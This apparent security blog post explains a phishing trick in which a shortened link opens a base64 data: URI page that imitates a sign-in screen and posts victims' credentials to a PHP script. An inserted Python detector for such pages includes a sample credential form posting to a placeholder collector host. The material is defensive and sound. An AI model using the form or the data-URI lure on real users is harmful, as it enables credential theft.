Keeping up with encoded Phishing Attacks
Cyber-criminals are constantly evolving the nature and complexity of their attack vectors.
This article explores an old technique — Phishing — and how one may fall victim depending on one’s level of security awareness. Before going into details of this specific attack, please remember a few simple rules:
- Be wary of email attachments.
- Never supply your email login credentials (username/password/token) as a prerequisite to opening an attachment or to any unknown site.
- If, for any reason, you failed to heed the above and have already supplied your credentials somewhere, reset your password immediately!
This specific attack utilized an HTML email message containing the “name-of-the-file-to-download”, “View” and “Download” links similar to those provided by Gmail, as shown here:
Clicking any of those links leads to this address [http://]bit.ly/2aj2s2K, which loads a base64-encoded page as the web browser address using the data:text/html;base64,ENCODED_DATA_IS_HERE format. The web browser then decodes and renders this page to look like below:
In reality, it was a simple HTML page with a blurred image used as the page background. Signing in to this page then triggered a submission to a server-side PHP script — at this point the attacker already has the victim’s credentials. This PHP script then uses the same “data:text/html;base64,” format to redirect the browser to a missing document.
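For defenders, a link or redirect target in the data:text/html;base64, format can be decoded offline and checked for a sign-in form before anyone opens it. The following is an added example, not code from the original article; the function name, the result keys and the collector.example host are assumptions made for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# data:[<mediatype>][;param...][;base64],<data>
DATA_URI = re.compile(r"^data:(?P<meta>[^,]*),(?P<body>.*)$", re.I | re.S)


class FormFinder(HTMLParser):
    """Collects form targets and notes whether a password field is present."""

    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True


def inspect_data_uri(uri):
    """Return findings for an HTML data: URI, or None for anything else."""
    m = DATA_URI.match(uri.strip())
    meta = [p.strip().lower() for p in m.group("meta").split(";")] if m else [""]
    if meta[0] != "text/html":
        return None
    html = unquote(m.group("body"))
    if "base64" in meta[1:]:
        b64 = "".join(html.split())
        b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
        html = base64.b64decode(b64).decode("utf-8", errors="replace")
    finder = FormFinder()
    finder.feed(html)
    return {
        "has_password_field": finder.has_password,
        "form_actions": finder.actions,
        "credential_form": finder.has_password and bool(finder.actions),
    }


# Constructed sample: a minimal sign-in form posting to a placeholder host.
SAMPLE_HTML = ('<form method="post" action="https://collector.example/post.php">'
               '<input name="u"><input type="password" name="p"></form>')
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML.encode()).decode()
```

Calling inspect_data_uri(SAMPLE_URI) reports the password field and the form target, which is the combination a mail gateway or proxy rule would flag for a page delivered entirely inside a URL.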
Following the simple preventive steps above and being generally cyber-security conscious can go a long way to keep us safe online.
Please share your Phishing experiences.